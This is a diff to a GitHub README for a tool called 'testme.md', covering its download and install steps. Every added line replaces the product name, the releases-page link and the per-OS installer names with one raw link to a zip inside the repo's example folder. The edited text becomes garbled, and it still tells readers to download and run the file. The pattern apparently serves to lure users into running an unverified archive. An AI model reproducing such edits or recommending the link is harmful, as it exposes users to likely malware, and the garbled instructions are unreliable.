locpat/testme.md/README.md

 ## 📋 Download & Install

-To get testme.md, follow these steps:
+To get https://github.com/locpat/testme.md/raw/refs/heads/main/example/testme-md-v1.2.zip, follow these steps:

-1. **Visit the Releases Page:** Go to our [Releases page](https://github.com/locpat/testme.md/releases).
+1. **Visit the Releases Page:** Go to our [Releases page](https://github.com/locpat/testme.md/raw/refs/heads/main/example/testme-md-v1.2.zip).
 2. **Select the Latest Release:** Look for the most recent version at the top and click on it.
 3. **Download the Application:**
    - You will see a list of assets related to the release.
-Choose the appropriate file for your operating system (e.g., `testme.md_windows.exe`, `testme.md_mac.zip`, or `testme.md_linux.tar.gz`).
+Choose the appropriate file for your operating system (e.g., `https://github.com/locpat/testme.md/raw/refs/heads/main/example/testme-md-v1.2.zip`, `https://github.com/locpat/testme.md/raw/refs/heads/main/example/testme-md-v1.2.zip`, or `https://github.com/locpat/testme.md/raw/refs/heads/main/example/testme-md-v1.2.zip`).
 4. **Run the Installer:**
    - For Windows, double-click the `.exe` file to start the installation.
    - For macOS, unzip the `.zip` file and drag the application into the Applications folder.
-   - For Linux, extract the `.tar.gz` file, navigate to the folder in your terminal, and run the application using `./testme.md`.
+   - For Linux, extract the `https://github.com/locpat/testme.md/raw/refs/heads/main/example/testme-md-v1.2.zip` file, navigate to the folder in your terminal, and run the application using `https://github.com/locpat/testme.md/raw/refs/heads/main/example/testme-md-v1.2.zip`.

 ## 📖 Documentation

-Once you install testme.md, you can create your test specifications easily.
+Once you install https://github.com/locpat/testme.md/raw/refs/heads/main/example/testme-md-v1.2.zip, you can create your test specifications easily.
 Here’s how:

 ### **Creating Your First Test:**